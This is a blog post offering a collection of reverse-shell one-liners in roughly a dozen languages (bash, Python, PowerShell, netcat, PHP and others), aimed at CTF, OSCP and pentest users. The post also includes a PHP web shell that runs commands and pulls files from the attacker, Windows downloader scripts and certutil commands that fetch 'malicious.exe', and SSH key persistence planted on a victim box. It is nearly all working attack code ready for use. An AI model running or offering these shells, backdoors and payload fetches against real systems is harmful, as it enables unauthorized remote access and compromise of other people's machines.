Back to blog

Blog

The ultimate reverse shell, file transfer and persistence collection

Home Blog The ultimate reverse shell, file transfer and persistence collection

She sells seas shells by the sea shore

If you are taking part in catch the flag competitions, OSCP (like me) or lucky enough to get a shell on a victim box during an active penetration test engagement, here is a list of useful one-liner reverse shells, but be warned, as I started to write this post it has become slightly more than just reverse shells and has deviated to include file transfer methods as you will usually want to do both.

I will be actively adding to this list so feel free to bookmark or contribute.

AWK Reverse shell

awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

 

Socat Reverse shell

# Attack box 
socat file:`tty`,raw,echo=0 tcp-listen:4444

 

# Victim box (interactive TTY shell)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4444

 

Powershell Reverse shell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("ip-address",port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

 

Bash Reverse shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

 

Perl Reverse shell

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Python Reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

PHP Reverse shell’s

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

 

Simple PHP shell to get a file onto a server and then to execute the file

if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.0.0.1:1234/" . $_REQUEST['fupload']));
};

if (isset($_REQUEST['fexec'])) {
  echo shell_exec($_REQUEST['fexec']);
};

 

Ruby Reverse shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Netcat Reverse shell

nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

 

#Upgrade to tty shell (can be used for most of these commands, personally most often used with netcat)
python -c 'import pty; pty.spawn("/bin/bash")'

 

Java Reverse shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

 

Groovy Reverse shell

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

 

Python local server / file transfer

Because when you get a shell usually you want to get something up there, python is my usual go to for spinning up a quick server to wget a file (assuming your IP is 192.168.0.10 and you have a file called malicious.sh in the folder you executed the python server from ).

# <= Python 2
python -m SimpleHTTPServer 8000
# >= Python 3
python3 -m http.server 8000

And retrieve the file using wget on Linux

wget http://192.168.0.10:8000/malicious.sh

 

Or Windows as it doesnt have wget you need to create a Visual Basic script which does the same (old/OSCP way see CertUtil after), so copy and paste this into a terminal be sure to press enter another time to execute the last line and actually write the script to the system.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs  
# then still on the victim machine use cscript to execute the vbscript "wget.vbs" to download the file:
cscript wget.vbs http://192.168.0.10:8000/malicious.exe malicious.exe

 

Or if possible… save yourself some hassel and “live off the land” with this slick 1 liner. You can use Certutil to download files (source):

certutil -urlcache -f http://192.168.0.10:8000/malicious.exe malicious.exe

 

Rsync’ing files/folders between Linux servers.

Not necessarily reverse shell but a quick and dirty method thats useful for transferring files cross server once a foothold has been attained.

# attack box 
ssh-keygen -t rsa -b 4096 -C "[email protected]"  -f ~/.ssh/id_rsa_hacker
# attack box (set correct permissions on the private key)
chmod 600 ~/.ssh/id_rsa_hacker
# cat and copy the contents of your new SSH public key i.e id_rsa_hacker.pub, then switch to the victim box and append to the end of the authorized_hosts file.
cat ~/.ssh/id_rsa_hacker.pub

You can now ssh freely one way (provided everything went smoothly), for 2 way access repeat the process the other way.

# To upload any file or folder use the following changing _PORT_/_FILE2TRANSFER_/_VICTIM_USER_/_VICTIM_IP_ etc as needs be
rsync -rvz -e 'ssh -p _PORT_ -i ~/.ssh/id_rsa_hacker' --progress _FILE2TRANSFER_ [email protected]_VICTIM_IP_:~/
Home Blog The ultimate reverse shell, file transfer and persistence collection